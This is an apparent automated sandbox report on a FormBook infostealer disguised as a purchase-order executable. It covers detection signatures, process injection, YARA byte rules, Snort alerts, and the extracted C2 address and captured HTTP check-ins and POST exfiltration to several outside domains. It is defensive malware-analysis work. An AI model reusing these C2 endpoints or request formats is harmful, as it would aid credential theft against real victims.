Edit tour

Windows Analysis Report
New PO-RJ-IN-003 - Knauf Queimados.exe

Overview

General Information

Sample Name:	New PO-RJ-IN-003 - Knauf Queimados.exe
Analysis ID:	755933
MD5:	244fc9610f75225aa3dc09958195beb1
SHA1:	ef0d6103d27090fc9d25e3ef3de2e1b6d9670d9c
SHA256:	05cdda3567b913d99627f8e41336404d5830816df65e1001d6b2ad05bd9ed18d
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to read the clipboard data

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

New PO-RJ-IN-003 - Knauf Queimados.exe (PID: 748 cmdline: C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe MD5: 244FC9610F75225AA3DC09958195BEB1)

jaxdij.exe (PID: 1572 cmdline: "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)

jaxdij.exe (PID: 5360 cmdline: "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)

explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rubthqnwyfue.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)

WerFault.exe (PID: 2912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rubthqnwyfue.exe (PID: 6040 cmdline: "C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L MD5: 2DD6C8B13AE7D028B0047435FF0DCB8A)

WerFault.exe (PID: 5420 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 444 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spirituallyzen.com/m9ae/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0f9:$sqlite3step: 68 34 1C 7B E1 0x1ac71:$sqlite3step: 68 34 1C 7B E1 0x1a13b:$sqlite3text: 68 38 2A 90 C5 0x1acb6:$sqlite3text: 68 38 2A 90 C5 0x1a152:$sqlite3blob: 68 53 D8 7F 8C 0x1accc:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0f9:$sqlite3step: 68 34 1C 7B E1 0x1ac71:$sqlite3step: 68 34 1C 7B E1 0x1a13b:$sqlite3text: 68 38 2A 90 C5 0x1acb6:$sqlite3text: 68 38 2A 90 C5 0x1a152:$sqlite3blob: 68 53 D8 7F 8C 0x1accc:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0f9:$sqlite3step: 68 34 1C 7B E1 0x1ac71:$sqlite3step: 68 34 1C 7B E1 0x1a13b:$sqlite3text: 68 38 2A 90 C5 0x1acb6:$sqlite3text: 68 38 2A 90 C5 0x1a152:$sqlite3blob: 68 53 D8 7F 8C 0x1accc:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0f9:$sqlite3step: 68 34 1C 7B E1 0x1ac71:$sqlite3step: 68 34 1C 7B E1 0x1a13b:$sqlite3text: 68 38 2A 90 C5 0x1acb6:$sqlite3text: 68 38 2A 90 C5 0x1a152:$sqlite3blob: 68 53 D8 7F 8C 0x1accc:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x78dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xedf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xfdfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb0f9:$sqlite3step: 68 34 1C 7B E1 0xbc71:$sqlite3step: 68 34 1C 7B E1 0xb13b:$sqlite3text: 68 38 2A 90 C5 0xbcb6:$sqlite3text: 68 38 2A 90 C5 0xb152:$sqlite3blob: 68 53 D8 7F 8C 0xbccc:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f090:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1edfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a0f9:$sqlite3step: 68 34 1C 7B E1 0x1ac71:$sqlite3step: 68 34 1C 7B E1 0x1a13b:$sqlite3text: 68 38 2A 90 C5 0x1acb6:$sqlite3text: 68 38 2A 90 C5 0x1a152:$sqlite3blob: 68 53 D8 7F 8C 0x1accc:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7d38:$a1: 3C 30 50 4F 53 54 74 09 40 0x207c7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbfe6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1951e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1931c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18dc8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1941e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x19596:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbbb1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18013:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f52e:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x20531:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1b830:$sqlite3step: 68 34 1C 7B E1 0x1c3a8:$sqlite3step: 68 34 1C 7B E1 0x1b872:$sqlite3text: 68 38 2A 90 C5 0x1c3ed:$sqlite3text: 68 38 2A 90 C5 0x1b889:$sqlite3blob: 68 53 D8 7F 8C 0x1c403:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: jaxdij.exe PID: 5360	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x69303:$a1: 3C 30 50 4F 53 54 74 09 40 0xc524f:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 5412	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xc881b:$a1: 3C 30 50 4F 53 54 74 09 40 0xccf2b:$a1: 3C 30 50 4F 53 54 74 09 40 0xd2506:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.jaxdij.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.jaxdij.exe.400000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7d38:$a1: 3C 30 50 4F 53 54 74 09 40 0x207c7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbfe6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1951e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.jaxdij.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1931c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18dc8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1941e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x19596:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbbb1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18013:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f52e:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x20531:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.jaxdij.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1b830:$sqlite3step: 68 34 1C 7B E1 0x1c3a8:$sqlite3step: 68 34 1C 7B E1 0x1b872:$sqlite3text: 68 38 2A 90 C5 0x1c3ed:$sqlite3text: 68 38 2A 90 C5 0x1b889:$sqlite3blob: 68 53 D8 7F 8C 0x1c403:$sqlite3blob: 68 53 D8 7F 8C
2.2.jaxdij.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.jaxdij.exe.400000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6f38:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f9c7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb1e6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1871e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.jaxdij.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1851c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17fc8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1861e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18796:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xadb1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17213:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e72e:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f731:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.jaxdij.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1aa30:$sqlite3step: 68 34 1C 7B E1 0x1b5a8:$sqlite3step: 68 34 1C 7B E1 0x1aa72:$sqlite3text: 68 38 2A 90 C5 0x1b5ed:$sqlite3text: 68 38 2A 90 C5 0x1aa89:$sqlite3blob: 68 53 D8 7F 8C 0x1b603:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 3 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 93.179.127.27

Timestamp:	192.168.2.593.179.127.2749736802031449 11/29/22-10:35:37.226497
SID:	2031449
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 107.148.15.81

Timestamp:	192.168.2.5107.148.15.8149749802031453 11/29/22-10:36:16.701501
SID:	2031453
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 107.148.15.81

Timestamp:	192.168.2.5107.148.15.8149749802031412 11/29/22-10:36:16.701501
SID:	2031412
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 93.179.127.27

Timestamp:	192.168.2.593.179.127.2749736802031453 11/29/22-10:35:37.226497
SID:	2031453
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 107.148.15.81

Timestamp:	192.168.2.5107.148.15.8149749802031449 11/29/22-10:36:16.701501
SID:	2031449
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 93.179.127.27

Timestamp:	192.168.2.593.179.127.2749736802031412 11/29/22-10:35:37.226497
SID:	2031412
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.gmrsnodes.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.gmrsnodes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gmrsnodes.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 72 79 74 59 37 68 71 32 6b 38 49 32 45 58 35 31 74 73 44 36 7e 30 75 53 52 72 4c 79 7a 30 54 75 34 6d 46 4c 76 76 77 49 7e 78 6b 7a 68 45 64 65 4a 70 4a 66 6d 36 65 52 64 30 33 53 68 47 65 6c 31 45 66 54 33 76 6a 38 45 72 46 7a 42 30 53 55 32 6e 65 33 38 51 4c 57 6f 56 49 4b 7e 46 4e 73 35 58 51 78 4a 5f 6e 66 7e 63 75 52 28 4e 63 54 4a 2d 54 4f 7a 47 4b 44 58 64 73 2d 54 39 72 4a 67 64 76 33 4b 7a 72 51 58 72 50 69 5a 32 7e 64 73 42 33 54 69 5a 36 58 4d 42 50 6f 64 4a 4d 39 59 79 77 31 36 48 77 71 6c 6b 4e 32 58 48 6a 6f 68 79 72 76 33 4e 62 61 6e 50 48 68 65 42 6b 72 46 7a 70 53 6a 51 49 78 57 42 43 76 53 30 4d 6d 78 6f 41 77 48 41 32 47 4a 72 54 70 76 70 4b 51 58 44 72 54 67 30 58 56 33 6b 37 58 6f 6b 50 69 43 73 48 6b 54 73 6b 4d 6f 49 38 36 61 59 72 54 32 61 31 73 6a 54 61 65 4a 52 47 6b 4d 6d 76 31 51 58 6d 62 52 67 64 62 62 61 65 55 6b 74 6c 58 30 61 66 64 38 6e 53 57 5a 6d 77 55 47 6d 51 33 6c 41 48 4a 57 37 7a 72 64 4c 37 47 61 43 4f 71 71 5f 5a 44 31 70 6d 70 37 5f 73 63 61 66 50 39 66 5a 38 47 59 4e 35 48 48 48 47 36 56 62 61 2d 77 71 78 53 30 47 55 66 66 31 64 48 37 76 4c 35 70 68 33 78 6c 4a 53 4c 5a 4d 34 4a 5a 75 33 38 69 37 4e 69 6c 36 70 67 48 39 46 6e 30 35 33 33 63 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=rytY7hq2k8I2EX51tsD6~0uSRrLyz0Tu4mFLvvwI~xkzhEdeJpJfm6eRd03ShGel1EfT3vj8ErFzB0SU2ne38QLWoVIK~FNs5XQxJ_nf~cuR(NcTJ-TOzGKDXds-T9rJgdv3KzrQXrPiZ2~dsB3TiZ6XMBPodJM9Yyw16HwqlkN2XHjohyrv3NbanPHheBkrFzpSjQIxWBCvS0MmxoAwHA2GJrTpvpKQXDrTg0XV3k7XokPiCsHkTskMoI86aYrT2a1sjTaeJRGkMmv1QXmbRgdbbaeUktlX0afd8nSWZmwUGmQ3lAHJW7zrdL7GaCOqq_ZD1pmp7_scafP9fZ8GYN5HHHG6Vba-wqxS0GUff1dH7vL5ph3xlJSLZM4JZu38i7Nil6pgH9Fn0533cQ).

Source: unknown

DNS traffic detected: queries for: www.oonrreward.xyz

Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.oonrreward.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.gmrsnodes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=q+GqSbkO5kqO+W9u2R8uyv/azK/Tyw9Ktq6EIVL87IABA33EfP0KANVapKUQlEGAPHMNZ2Czo2C9EtWkfzzg2b9ydKIDbcUulA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.dailyheraldresearch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=XxObD+bozu8R8o86HZokIAwRDcTSUgt1X0zVs8jY2xx2j7amGX2Nanqc4HjuSpD/F/TSiqNoyiNwTcXhTU7ob6qQALfoq6EoqQ==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.publickit.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.lee-perez.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1Host: www.frwqc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
